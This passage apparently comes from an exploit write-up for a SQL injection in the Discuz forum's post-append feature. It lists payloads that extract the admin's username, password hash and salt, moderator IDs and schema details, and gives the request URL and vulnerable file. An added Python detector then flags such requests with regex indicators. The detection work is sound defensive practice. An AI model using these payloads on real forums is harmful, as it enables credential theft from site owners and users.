A', 'subobject' = (/*! Select */concat (username, '|', password, '|', salt) from pre_ucenter_members where uid = 1 limit 0, 1), comment ='
Some further statements follow.
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 1), comment = '// view the Management User
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 2), comment = '// super moderator
', 'Subobject' = (/*! Select */group_concat (uid, ':') from pre_common_member where groupid = 3), comment = '// super moderator
', 'Subobject' = (/*! Select */table_name from information_schema.tables where table_schema = 0x0000 limit 0, 1), comment = '// run the table
', 'Subobject' = (/*! Select */group_concat (schema_name) from information_schema.schemata), comment = '// obtain all databases
', 'Subobject' = (/*! Select */concat (@ version, ':', user (), ':', database (), comment = '// version information
The injection statement is then submitted through the reply's supplement (post append) feature.
Post-append URL:
forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}
The preceding statements write the retrieved content into the reply in the topic, and the result is returned there.
Vulnerable file:
source\module\forum\forum_misc.php
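For detection, the following added example (not part of the original page or of the Discuz code base) flags post-append requests whose body carries the markers seen in the statements above: a quote breakout followed by a column assignment, a MySQL versioned comment around select, information_schema enumeration, the member tables, and the reopened comment column. The request record layout and the "message" form field name are assumptions; the sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlencode, urlsplit

# Patterns derived from the statements shown on this page.
INDICATORS = {
    "versioned_comment": re.compile(r"/\*!\s*\d*\s*select", re.I),
    "quote_breakout_assignment": re.compile(r"'\s*,\s*['`]?\w+['`]?\s*=\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\s*\.\s*(tables|schemata)", re.I),
    "member_table": re.compile(r"\bpre_(ucenter_members|common_member)\b", re.I),
    "comment_reopen": re.compile(r",\s*comment\s*=\s*'", re.I),
}

def is_postappend(url):
    """True when the URL targets forum.php with mod=misc and action=postappend."""
    parts = urlsplit(url)
    query = {k.lower(): [v.lower() for v in vs]
             for k, vs in parse_qs(parts.query).items()}
    return (parts.path.lower().endswith("forum.php")
            and query.get("mod") == ["misc"]
            and query.get("action") == ["postappend"])

def score_request(url, body):
    """Return the sorted names of indicators found in a post-append request body."""
    if not is_postappend(url):
        return []
    text = unquote_plus(body)  # form bodies arrive URL-encoded
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

# Constructed sample records; "message" is an assumed form field name.
SAMPLE_URL = "/forum.php?mod=misc&tid=1&action=postappend&pid=2"
SUSPICIOUS_BODY = urlencode({
    "message": "', 'Subobject' = (/*! Select */group_concat (schema_name) "
               "from information_schema.schemata), comment = '"
})
BENIGN_BODY = urlencode({"message": "Thanks, that fixed it for me."})

if __name__ == "__main__":
    for body in (SUSPICIOUS_BODY, BENIGN_BODY):
        print(score_request(SAMPLE_URL, body))
```

A request matching two or more indicators on this endpoint is a reasonable threshold for alerting; a single match is better treated as a lead for review.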